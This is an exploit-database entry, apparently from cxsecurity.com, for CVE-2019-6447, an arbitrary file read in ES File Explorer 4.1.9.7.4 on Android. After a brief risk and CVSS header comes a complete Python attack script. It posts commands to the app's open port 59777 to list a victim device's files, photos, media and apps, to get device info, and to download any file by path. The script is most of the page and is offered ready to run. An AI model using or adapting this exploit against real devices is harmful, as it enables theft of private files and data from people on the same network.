ES File Explorer 4.1.9.7.4 Arbitrary File Read

2021.06.29
Credit: Nehal Zaman
Risk: High
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 4.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 6.5/10
Exploit range: Adjacent network
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read # Date: 29/06/2021 # Exploit Author: Nehal Zaman # Version: ES File Explorer v4.1.9.7.4 # Tested on: Android # CVE : CVE-2019-6447 import requests import json import ast import sys if len(sys.argv) < 3: print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]") sys.exit(1) url = 'http://' + sys.argv[2] + ':59777' cmd = sys.argv[1] cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo'] listCmds = cmds[:9] if cmd not in cmds: print("[-] WRONG COMMAND!") print("Available commands : ") print(" listFiles : List all Files.") print(" listPics : List all Pictures.") print(" listVideos : List all videos.") print(" listAudios : List all audios.") print(" listApps : List Applications installed.") print(" listAppsSystem : List System apps.") print(" listAppsPhone : List Communication related apps.") print(" listAppsSdcard : List apps on the SDCard.") print(" listAppsAll : List all Application.") print(" getFile : Download a file.") print(" getDeviceInfo : Get device info.") sys.exit(1) print("\n==================================================================") print("| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |") print("| Coded By : Nehal a.k.a PwnerSec |") print("==================================================================\n") header = {"Content-Type" : "application/json"} proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"} def httpPost(cmd): data = json.dumps({"command":cmd}) response = requests.post(url, headers=header, data=data) return ast.literal_eval(response.text) def parse(text, keys): for dic in text: for key in keys: print(f"{key} : {dic[key]}") print('') def do_listing(cmd): response = httpPost(cmd) if len(response) == 0: keys = [] else: keys = list(response[0].keys()) parse(response, keys) if cmd in listCmds: do_listing(cmd) elif cmd == cmds[9]: if len(sys.argv) != 4: print("[+] Include file name to download.") sys.exit(1) elif sys.argv[3][0] != '/': print("[-] You need to provide full path of the file.") sys.exit(1) else: path = sys.argv[3] print("[+] Downloading file...") response = requests.get(url + path) with open('out.dat','wb') as wf: wf.write(response.content) print("[+] Done. Saved as `out.dat`.") elif cmd == cmds[10]: response = httpPost(cmd) keys = list(response.keys()) for key in keys: print(f"{key} : {response[key]}")


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top